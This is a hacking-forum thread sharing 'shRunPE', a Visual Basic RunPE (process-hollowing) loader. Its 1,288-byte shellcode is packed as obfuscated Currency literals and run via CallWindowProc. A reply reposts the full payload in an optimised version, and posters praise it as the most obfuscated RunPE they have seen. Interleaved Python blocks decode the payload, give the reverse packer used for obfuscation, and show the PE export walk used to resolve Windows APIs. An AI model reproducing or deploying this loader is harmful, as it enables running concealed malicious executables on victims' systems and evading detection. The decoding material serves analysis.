
Thread: shRunpe [fully standalone Runpe shellcode] --by hamavb

  1. #1
    Junior Member (Join Date: Aug 2011, Posts: 5)

    shRunpe [fully standalone Runpe shellcode] --by hamavb

    As the title says, this is a fully standalone RunPE shellcode (I assume that you know what RunPE is;
    if not, try Googling it, then come back and read this thread).
    And of course the shellcode can be used in any programming language; you just have to convert it.

    Code:
    'Author : hamavb
    'First cut : 02/03/2012 16:50
    'Credits : karcrack & cobein
    
    ' CallWindowProc is used here as a generic "call this address" primitive:
    ' the first argument is treated as a function pointer and the other four
    ' are passed to it on the stack.
    Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcW" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
    
    ' TargetHost: path of the host executable to launch; bBuffer: raw PE image to run inside it.
    Public Function ShRunPE(ByVal TargetHost As String, bBuffer() As Byte)
        ' A Currency is a 64-bit integer scaled by 10000, so each literal below
        ' packs 8 consecutive bytes of the shellcode (161 values = 1288 bytes).
        Dim Asm(160) As Currency
        Asm(0) = 3011782251321.1488@
        Asm(1) = 2842944510165.0021@
        Asm(2) = 21475170.7244@
        Asm(3) = 3039972698908.2734@
        Asm(4) = 0.0108@
        Asm(5) = 0@
        Asm(6) = 0@
        Asm(7) = 0@
        Asm(8) = 0@
        Asm(9) = 0@
        Asm(10) = 770918988510973.1328@
        Asm(11) = 609196292101137.4146@
        Asm(12) = 318076019310180.1508@
        Asm(13) = -857485367476117.5446@
        Asm(14) = 399392180.8913@
        Asm(15) = -706833318868351.5511@
        Asm(16) = 6879439133396.1731@
        Asm(17) = 763810498335316.3776@
        Asm(18) = 388654513.6166@
        Asm(19) = 98506041997.169@
        Asm(20) = 24964196938431.9488@
        Asm(21) = 22034984796.16@
        Asm(22) = 305625529718164.0704@
        Asm(23) = -410459675325501.5192@
        Asm(24) = -172419915909691.6991@
        Asm(25) = 150655457759015.8157@
        Asm(26) = 763810498295053.1535@
        Asm(27) = -334758189796557.4082@
        Asm(28) = 763810498175933.6042@
        Asm(29) = 769693235337619.0272@
        Asm(30) = 658651445508203.5218@
        Asm(31) = 93228415366.4744@
        Asm(32) = 337544363.4688@
        Asm(33) = -171181400105556.1333@
        Asm(34) = -43143787013419.7499@
        Asm(35) = -843073848963811.6758@
        Asm(36) = 586115344006226.9449@
        Asm(37) = 81903309047.8335@
        Asm(38) = -170655782147139.7888@
        Asm(39) = -296106572219468.926@
        Asm(40) = -171744351251070.9758@
        Asm(41) = 478565684273270.0365@
        Asm(42) = 766128157362243.3@
        Asm(43) = 763822153521118.6688@
        Asm(44) = -5798494293561.088@
        Asm(45) = 292876624.968@
        Asm(46) = -303308424893800.028@
        Asm(47) = 18687314406408.1922@
        Asm(48) = -814921249263117.9264@
        Asm(49) = 377936345376908.9026@
        Asm(50) = 914455950214871.0911@
        Asm(51) = 793381819255881.7282@
        Asm(52) = 247979454486563.4385@
        Asm(53) = -842580059571706.7544@
        Asm(54) = 261953043.9225@
        Asm(55) = 1351124663940.1355@
        Asm(56) = -5728895679889.4336@
        Asm(57) = 16435523184027.2177@
        Asm(58) = 453291086712582.9632@
        Asm(59) = -171181401297649.6638@
        Asm(60) = 247984901789109.5093@
        Asm(61) = 763853927511347.5304@
        Asm(62) = 68764336814004.0238@
        Asm(63) = 377880083361326.677@
        Asm(64) = 58153857883.8015@
        Asm(65) = -170634502550313.984@
        Asm(66) = -6846382739763.962@
        Asm(67) = 217285200.5584@
        Asm(68) = 273152312385105.8024@
        Asm(69) = 13733354816300.6466@
        Asm(70) = 764000768607145.1648@
        Asm(71) = 17395153563837.4458@
        Asm(72) = -353751767489869.7902@
        Asm(73) = 763363.3281@
        Asm(74) = 392094642558210.6624@
        Asm(75) = 764766522162398.7432@
        Asm(76) = 126410412043612.3678@
        Asm(77) = 27351427555.8027@
        Asm(78) = 11706747011255.5776@
        Asm(79) = -757276053642969.088@
        Asm(80) = 360268856045024.0513@
        Asm(81) = 749398978656993.7514@
        Asm(82) = 12354147786351.6251@
        Asm(83) = 769693219347778.7648@
        Asm(84) = 414640788194904.6822@
        Asm(85) = -171181417231738.2261@
        Asm(86) = 276807880992725.4373@
        Asm(87) = -842805239553082.2424@
        Asm(88) = 37043291672.0721@
        Asm(89) = 507392545273423.744@
        Asm(90) = 769258247064186.1864@
        Asm(91) = 68764336812483.5886@
        Asm(92) = 360268875651665.0832@
        Asm(93) = 749398978495932.017@
        Asm(94) = 9651988025294.3009@
        Asm(95) = 769693219347778.7648@
        Asm(96) = 126410412042563.7942@
        Asm(97) = -171294008471547.0205@
        Asm(98) = -387449256181707.5451@
        Asm(99) = 363299752439103.6175@
        Asm(100) = -410459675325517.2888@
        Asm(101) = -172926570866094.7199@
        Asm(102) = -635688100489173.3787@
        Asm(103) = 763810497261576.6376@
        Asm(104) = 126410412042144.3634@
        Asm(105) = -843073849903335.4646@
        Asm(106) = 769693215773368.7817@
        Asm(107) = 414640788193698.8194@
        Asm(108) = 4951342415221.7475@
        Asm(109) = 4636260512845.0048@
        Asm(110) = -171631782205882.368@
        Asm(111) = 507388721888441.1549@
        Asm(112) = 31815578412492.9256@
        Asm(113) = -872572382190820.8041@
        Asm(114) = -286501654647065.8048@
        Asm(115) = -428658242031485.5343@
        Asm(116) = 3149895693349.6588@
        Asm(117) = 22752143878461.8496@
        Asm(118) = 10655039450.0177@
        Asm(119) = 19434514006.2976@
        Asm(120) = 2249161163731.9936@
        Asm(121) = 590215178835617.3824@
        Asm(122) = -171519195984216.1688@
        Asm(123) = 334471606820667.3981@
        Asm(124) = -6937148713125.7624@
        Asm(125) = 3006614124114.7186@
        Asm(126) = 457802337043140.7336@
        Asm(127) = 34749504.673@
        Asm(128) = -843073850212036.239@
        Asm(129) = 536232810004781.4409@
        Asm(130) = 699902812802672.356@
        Asm(131) = -439434742750697.5805@
        Asm(132) = 756604737376275.6714@
        Asm(133) = 869968633553.1604@
        Asm(134) = 450404738465.792@
        Asm(135) = -7194094211452.1344@
        Asm(136) = -1353710065018.4752@
        Asm(137) = -439079356974065.2545@
        Asm(138) = 566676858034822.4232@
        Asm(139) = 32602016.4622@
        Asm(140) = -7089160921751.4365@
        Asm(141) = 410061545662244.4496@
        Asm(142) = 617979275378688@
        Asm(143) = 725985904952471.1762@
        Asm(144) = 854193482151915.9435@
        Asm(145) = -842159216757581.13@
        Asm(146) = 457592490565246.7766@
        Asm(147) = 17684902147728.7019@
        Asm(148) = 643884385768544.0491@
        Asm(149) = 622040492439682.185@
        Asm(150) = 842553683379673.7879@
        Asm(151) = 865826324060815.6483@
        Asm(152) = 233132869356380.6979@
        Asm(153) = -841594865717950.1309@
        Asm(154) = -598169487549740.1085@
        Asm(155) = 22006038477175.2068@
        Asm(156) = 843978581769276.108@
        Asm(157) = -840178504924852.7391@
        Asm(158) = -836852911227146.7764@
        Asm(159) = 643884385767650.3812@
        Asm(160) = 328436.0538@
    
        ' Jump into the byte buffer: the shellcode receives the wide-string host
        ' path and the PE buffer as its first two arguments; the last two are passed as 0.
        CallWindowProc VarPtr(Asm(0)), StrPtr(TargetHost), VarPtr(bBuffer(0)), 0, 0
    
    End Function
    Usage example:

    Code:
    Dim bPE() As Byte
    ' fill bPE with the raw PE image to run (for example from a file or a resource)
    ShRunPE "Target Exe Path", bPE
    Enjoy :)
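Reading the listing above as an analyst: VB6 stores a Currency as a little-endian signed 64-bit integer equal to the decimal value times 10,000, so each `@` literal packs eight consecutive bytes of the shellcode and VarPtr(Asm(0)) is simply the start of a 1288-byte buffer. The decoder below is an added example (it is not part of hamavb's post or of the tool mentioned later in the thread): it unpacks the first eleven values from the listing and pulls out the UTF-16 strings the stub carries. Decoded, Asm(0) opens with pushad and a call whose target lands on a pop ebx just past an embedded string table, the usual call/pop trick for getting the address of inline data; the strings are "kernel32" and "ntdll". bytes_to_currency does the reverse packing that a byte-array-to-Currency conversion tool has to perform.

```python
from decimal import Decimal
import struct

# Currency literals copied from Asm(0)..Asm(10) of the ShRunPE listing above.
CURRENCY_LITERALS = [
    "3011782251321.1488", "2842944510165.0021", "21475170.7244",
    "3039972698908.2734", "0.0108", "0", "0", "0", "0", "0",
    "770918988510973.1328",
]


def currency_to_bytes(literal):
    """Return the 8 bytes one VB6 Currency literal occupies in memory.

    VB6 stores Currency as a little-endian signed 64-bit integer equal to the
    decimal value times 10,000 (four fixed decimal places). Decimal, not float,
    is used so the low-order bytes are not rounded away.
    """
    scaled = int(Decimal(literal) * 10000)
    return struct.pack("<q", scaled)


def bytes_to_currency(chunk):
    """Inverse direction: pack 8 shellcode bytes as a Currency literal."""
    if len(chunk) != 8:
        raise ValueError("Currency holds exactly 8 bytes")
    value = struct.unpack("<q", chunk)[0]
    whole, frac = divmod(abs(value), 10000)
    return f"{'-' if value < 0 else ''}{whole}.{frac:04d}"


def decode_blob(literals):
    """Concatenate the decoded values into the raw code/data buffer."""
    return b"".join(currency_to_bytes(lit) for lit in literals)


def wide_strings(blob, min_len=4):
    """Pull printable NUL-terminated UTF-16LE strings out of a blob."""
    found, run = [], []
    for i in range(0, len(blob) - 1, 2):
        lo, hi = blob[i], blob[i + 1]
        if hi == 0 and 0x20 <= lo < 0x7F:
            run.append(chr(lo))
            continue
        if len(run) >= min_len:
            found.append("".join(run))
        run = []
    if len(run) >= min_len:
        found.append("".join(run))
    return found


def call_target(blob, offset):
    """Resolve the destination of a 5-byte `E8 rel32` call at `offset`."""
    if blob[offset] != 0xE8:
        raise ValueError("no call opcode at offset %#x" % offset)
    rel = struct.unpack_from("<i", blob, offset + 1)[0]
    return offset + 5 + rel


if __name__ == "__main__":
    blob = decode_blob(CURRENCY_LITERALS)
    print(blob[:8].hex())          # 60e84e0000006b00: pushad; call +0x4e
    print(wide_strings(blob))      # ['kernel32', 'ntdll']
    target = call_target(blob, 1)  # 84: the call lands on 5B = pop ebx
    print(hex(target), blob[target] == 0x5B)
```

Feed it all 161 literals to recover the whole blob for disassembly. Parsing with Decimal matters: a float would not preserve the low digits, and those are the high bytes of every eighth-byte group.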

  2. #2
    Senior Member (Join Date: Jun 2008, Location: 0x40000, Posts: 1,467)

    How does your shellcode find the API addresses? I'm too lazy to decompile atm, but I hope you don't have them hardcoded.

  3. #3
    Junior Member (Join Date: Aug 2011, Posts: 5)

    I'm not that stupid :p

    It finds the API addresses by walking the kernel DLL image to get the LoadLibrary and GetProcAddress pointers, then calls the required API.
    http://th3-0utl4ws.com/
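The approach described in the post above (walk the kernel DLL image to get LoadLibrary and GetProcAddress) is the standard export-table walk. What follows is an added example, not hamavb's code: it builds a small, entirely hypothetical PE32 image standing in for kernel32.dll (the export names are real kernel32 exports, but the RVAs and the 0x7C800000 base address are made up) and then resolves names from it the way position-independent code does, DOS header to e_lfanew, optional header data directory to the export directory, then the parallel name, ordinal and function tables. It also handles forwarded exports, which a naive walk would return as a bogus code address. Finding the module base in the first place (from the PEB in a live process) is outside this example; here the image is handed in as a buffer.

```python
import struct

# PE layout constants from winnt.h (the format itself, not from the page).
PE32_MAGIC = 0x10B
OPT_HDR_SIZE_PE32 = 0xE0
EXPORT_DIR_INDEX = 0              # IMAGE_DIRECTORY_ENTRY_EXPORT
MODULE_BASE = 0x7C800000          # hypothetical load address of the fake module


def build_fake_dll(dll_name, exports):
    """Build a minimal flat PE32 image (RVA == offset) exporting `exports`,
    a dict of name -> function RVA (int) or forwarder string ("DLL.Func").
    Hypothetical stand-in for kernel32.dll so the walk below runs offline."""
    export_rva = 0x400
    order = list(exports)                   # ordinal order = insertion order
    names = sorted(order)                   # AddressOfNames is kept sorted
    n = len(order)
    funcs_rva = export_rva + 40             # IMAGE_EXPORT_DIRECTORY is 40 bytes
    names_rva = funcs_rva + 4 * n
    ords_rva = names_rva + 4 * n
    strings_rva = ords_rva + 2 * n
    strings = bytearray()

    def add_str(s):
        rva = strings_rva + len(strings)
        strings.extend(s.encode("ascii") + b"\0")
        return rva

    dllname_rva = add_str(dll_name)
    name_rvas = {nm: add_str(nm) for nm in names}
    funcs = b"".join(struct.pack("<I", add_str(v) if isinstance(v, str) else v)
                     for v in (exports[nm] for nm in order))
    name_tab = b"".join(struct.pack("<I", name_rvas[nm]) for nm in names)
    ord_tab = b"".join(struct.pack("<H", order.index(nm)) for nm in names)
    export_dir = struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, dllname_rva, 1, n, n,
                             funcs_rva, names_rva, ords_rva)
    export_blob = export_dir + funcs + name_tab + ord_tab + bytes(strings)
    img = bytearray(export_rva) + export_blob
    img[0:2] = b"MZ"
    nt = 0x80
    struct.pack_into("<I", img, 0x3C, nt)                        # e_lfanew
    img[nt:nt + 4] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", img, nt + 4, 0x14C, 1, 0, 0, 0,  # IMAGE_FILE_HEADER
                     OPT_HDR_SIZE_PE32, 0x2102)
    opt = nt + 24
    struct.pack_into("<H", img, opt, PE32_MAGIC)
    struct.pack_into("<II", img, opt + 96 + 8 * EXPORT_DIR_INDEX,  # DataDirectory[0]
                     export_rva, len(export_blob))
    return bytes(img)


def read_cstr(image, off):
    return image[off:image.index(b"\0", off)].decode("ascii")


def find_export(image, wanted):
    """Walk the export directory the way position-independent shellcode does:
    MZ -> e_lfanew -> optional header DataDirectory[0] -> the three tables.
    Returns the function RVA, the forwarder string, or None if not exported."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad NT signature")
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", image, opt)[0]
    dd = opt + (96 if magic == PE32_MAGIC else 112)              # PE32 vs PE32+
    export_rva, export_size = struct.unpack_from("<II", image, dd + 8 * EXPORT_DIR_INDEX)
    if export_rva == 0:
        return None
    n_funcs, n_names, funcs_rva, names_rva, ords_rva = struct.unpack_from(
        "<IIIII", image, export_rva + 20)
    for i in range(n_names):
        name_rva = struct.unpack_from("<I", image, names_rva + 4 * i)[0]
        if read_cstr(image, name_rva) != wanted:
            continue
        idx = struct.unpack_from("<H", image, ords_rva + 2 * i)[0]  # ordinal - Base
        if idx >= n_funcs:
            raise ValueError("corrupt export table")
        func_rva = struct.unpack_from("<I", image, funcs_rva + 4 * idx)[0]
        # A function RVA that points inside the export directory is a
        # forwarder string, not code: kernel32 forwards some names to ntdll.
        if export_rva <= func_rva < export_rva + export_size:
            return read_cstr(image, func_rva)
        return func_rva
    return None


FAKE_KERNEL32 = build_fake_dll("KERNEL32.dll", {
    "LoadLibraryA": 0x2A00,                  # RVAs are invented for the example
    "GetProcAddress": 0x2B40,
    "VirtualAlloc": 0x2C10,
    "RtlMoveMemory": "NTDLL.RtlMoveMemory",  # forwarded export
})


def resolve(name, image=FAKE_KERNEL32, base=MODULE_BASE):
    """base + RVA, as the shellcode computes it; forwarders come back as-is."""
    hit = find_export(image, name)
    return base + hit if isinstance(hit, int) else hit


if __name__ == "__main__":
    for api in ("LoadLibraryA", "GetProcAddress", "RtlMoveMemory", "NoSuchApi"):
        print(api, resolve(api))
```

Once GetProcAddress and LoadLibrary are resolved this way, everything else the loader needs can go through them, which is why the post only has to walk one module.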

  4. #4
    Senior Member (Join Date: Jun 2008, Location: 0x40000, Posts: 1,467)

    +1 for that, no points of criticism. In a future version you could make an initialization function which loads the shellcode into the byte array to increase speed for multiple calls. Also you could split the ASM in two parts, so people can use your API resolution function apart from the RunPE, so they can use it as a LoadLibrary/GetProcAddress replacement also. Excellent.

  5. #5
    Senior Member (Join Date: Nov 2005, Posts: 176)

    Nice Sharing
    + rep from me

  6. #6
    Junior Member (Join Date: Aug 2011, Posts: 5)

    Will do next time, but I don't think that it needs an initialization function since it's a one-call function.

  7. #7
    Senior Member (Join Date: Nov 2010, Location: Brazil, Posts: 231)

    Seems pretty good!

  8. #8
    Night's Watch (Join Date: Oct 2009, Location: Clng(&H1337 Xor &H11AD), Posts: 361)

    Quote Originally Posted by hamavb View Post
    will do next time, but i don't think that it need initialization function since it's one call function.
    You can just embed it into the function
    Code:
    Public Function ShRunPE(ByVal TargetHost As String, bBuffer() As Byte)
        ' Static keeps the array alive between calls, so the literals are
        ' assigned on the first call only and later calls jump straight in.
        Static Asm(160) As Currency
        Static s_bInit As Boolean
    
        If s_bInit = False Then
            Asm(0) = 3011782251321.1488@
            Asm(1) = 2842944510165.0021@
            Asm(2) = 21475170.7244@
            Asm(3) = 3039972698908.2734@
            Asm(4) = 0.0108@
            Asm(5) = 0@
            Asm(6) = 0@
            Asm(7) = 0@
            Asm(8) = 0@
            Asm(9) = 0@
            Asm(10) = 770918988510973.1328@
            Asm(11) = 609196292101137.4146@
            Asm(12) = 318076019310180.1508@
            Asm(13) = -857485367476117.5446@
            Asm(14) = 399392180.8913@
            Asm(15) = -706833318868351.5511@
            Asm(16) = 6879439133396.1731@
            Asm(17) = 763810498335316.3776@
            Asm(18) = 388654513.6166@
            Asm(19) = 98506041997.169@
            Asm(20) = 24964196938431.9488@
            Asm(21) = 22034984796.16@
            Asm(22) = 305625529718164.0704@
            Asm(23) = -410459675325501.5192@
            Asm(24) = -172419915909691.6991@
            Asm(25) = 150655457759015.8157@
            Asm(26) = 763810498295053.1535@
            Asm(27) = -334758189796557.4082@
            Asm(28) = 763810498175933.6042@
            Asm(29) = 769693235337619.0272@
            Asm(30) = 658651445508203.5218@
            Asm(31) = 93228415366.4744@
            Asm(32) = 337544363.4688@
            Asm(33) = -171181400105556.1333@
            Asm(34) = -43143787013419.7499@
            Asm(35) = -843073848963811.6758@
            Asm(36) = 586115344006226.9449@
            Asm(37) = 81903309047.8335@
            Asm(38) = -170655782147139.7888@
            Asm(39) = -296106572219468.926@
            Asm(40) = -171744351251070.9758@
            Asm(41) = 478565684273270.0365@
            Asm(42) = 766128157362243.3@
            Asm(43) = 763822153521118.6688@
            Asm(44) = -5798494293561.088@
            Asm(45) = 292876624.968@
            Asm(46) = -303308424893800.028@
            Asm(47) = 18687314406408.1922@
            Asm(48) = -814921249263117.9264@
            Asm(49) = 377936345376908.9026@
            Asm(50) = 914455950214871.0911@
            Asm(51) = 793381819255881.7282@
            Asm(52) = 247979454486563.4385@
            Asm(53) = -842580059571706.7544@
            Asm(54) = 261953043.9225@
            Asm(55) = 1351124663940.1355@
            Asm(56) = -5728895679889.4336@
            Asm(57) = 16435523184027.2177@
            Asm(58) = 453291086712582.9632@
            Asm(59) = -171181401297649.6638@
            Asm(60) = 247984901789109.5093@
            Asm(61) = 763853927511347.5304@
            Asm(62) = 68764336814004.0238@
            Asm(63) = 377880083361326.677@
            Asm(64) = 58153857883.8015@
            Asm(65) = -170634502550313.984@
            Asm(66) = -6846382739763.962@
            Asm(67) = 217285200.5584@
            Asm(68) = 273152312385105.8024@
            Asm(69) = 13733354816300.6466@
            Asm(70) = 764000768607145.1648@
            Asm(71) = 17395153563837.4458@
            Asm(72) = -353751767489869.7902@
            Asm(73) = 763363.3281@
            Asm(74) = 392094642558210.6624@
            Asm(75) = 764766522162398.7432@
            Asm(76) = 126410412043612.3678@
            Asm(77) = 27351427555.8027@
            Asm(78) = 11706747011255.5776@
            Asm(79) = -757276053642969.088@
            Asm(80) = 360268856045024.0513@
            Asm(81) = 749398978656993.7514@
            Asm(82) = 12354147786351.6251@
            Asm(83) = 769693219347778.7648@
            Asm(84) = 414640788194904.6822@
            Asm(85) = -171181417231738.2261@
            Asm(86) = 276807880992725.4373@
            Asm(87) = -842805239553082.2424@
            Asm(88) = 37043291672.0721@
            Asm(89) = 507392545273423.744@
            Asm(90) = 769258247064186.1864@
            Asm(91) = 68764336812483.5886@
            Asm(92) = 360268875651665.0832@
            Asm(93) = 749398978495932.017@
            Asm(94) = 9651988025294.3009@
            Asm(95) = 769693219347778.7648@
            Asm(96) = 126410412042563.7942@
            Asm(97) = -171294008471547.0205@
            Asm(98) = -387449256181707.5451@
            Asm(99) = 363299752439103.6175@
            Asm(100) = -410459675325517.2888@
            Asm(101) = -172926570866094.7199@
            Asm(102) = -635688100489173.3787@
            Asm(103) = 763810497261576.6376@
            Asm(104) = 126410412042144.3634@
            Asm(105) = -843073849903335.4646@
            Asm(106) = 769693215773368.7817@
            Asm(107) = 414640788193698.8194@
            Asm(108) = 4951342415221.7475@
            Asm(109) = 4636260512845.0048@
            Asm(110) = -171631782205882.368@
            Asm(111) = 507388721888441.1549@
            Asm(112) = 31815578412492.9256@
            Asm(113) = -872572382190820.8041@
            Asm(114) = -286501654647065.8048@
            Asm(115) = -428658242031485.5343@
            Asm(116) = 3149895693349.6588@
            Asm(117) = 22752143878461.8496@
            Asm(118) = 10655039450.0177@
            Asm(119) = 19434514006.2976@
            Asm(120) = 2249161163731.9936@
            Asm(121) = 590215178835617.3824@
            Asm(122) = -171519195984216.1688@
            Asm(123) = 334471606820667.3981@
            Asm(124) = -6937148713125.7624@
            Asm(125) = 3006614124114.7186@
            Asm(126) = 457802337043140.7336@
            Asm(127) = 34749504.673@
            Asm(128) = -843073850212036.239@
            Asm(129) = 536232810004781.4409@
            Asm(130) = 699902812802672.356@
            Asm(131) = -439434742750697.5805@
            Asm(132) = 756604737376275.6714@
            Asm(133) = 869968633553.1604@
            Asm(134) = 450404738465.792@
            Asm(135) = -7194094211452.1344@
            Asm(136) = -1353710065018.4752@
            Asm(137) = -439079356974065.2545@
            Asm(138) = 566676858034822.4232@
            Asm(139) = 32602016.4622@
            Asm(140) = -7089160921751.4365@
            Asm(141) = 410061545662244.4496@
            Asm(142) = 617979275378688@
            Asm(143) = 725985904952471.1762@
            Asm(144) = 854193482151915.9435@
            Asm(145) = -842159216757581.13@
            Asm(146) = 457592490565246.7766@
            Asm(147) = 17684902147728.7019@
            Asm(148) = 643884385768544.0491@
            Asm(149) = 622040492439682.185@
            Asm(150) = 842553683379673.7879@
            Asm(151) = 865826324060815.6483@
            Asm(152) = 233132869356380.6979@
            Asm(153) = -841594865717950.1309@
            Asm(154) = -598169487549740.1085@
            Asm(155) = 22006038477175.2068@
            Asm(156) = 843978581769276.108@
            Asm(157) = -840178504924852.7391@
            Asm(158) = -836852911227146.7764@
            Asm(159) = 643884385767650.3812@
            Asm(160) = 328436.0538@
    
            s_bInit = True
        End If
    
        CallWindowProc VarPtr(Asm(0)), StrPtr(TargetHost), VarPtr(bBuffer(0)), 0, 0
    End Function
    Well done though, this is the most obfuscated RunPE I've ever seen. Hope you didn't convert all those currency values by hand.

  9. #9
    Junior Member (Join Date: Aug 2011, Posts: 5)

    Quote Originally Posted by Joefish View Post
    You can just embed it into the function
    Hope you didn't convert all those currency values by hand
    That would be a long way to do it, but I made a tool to do that for me.

    Thanks for optimizing the shRunpe.

    Maybe I should mod it to support a command line option?

  10. #10
    Senior Member (Join Date: Jan 2010, Location: PLUTO, Posts: 257)

    This is the best RunPE I've ever seen... Thanks for sharing... +rep from me
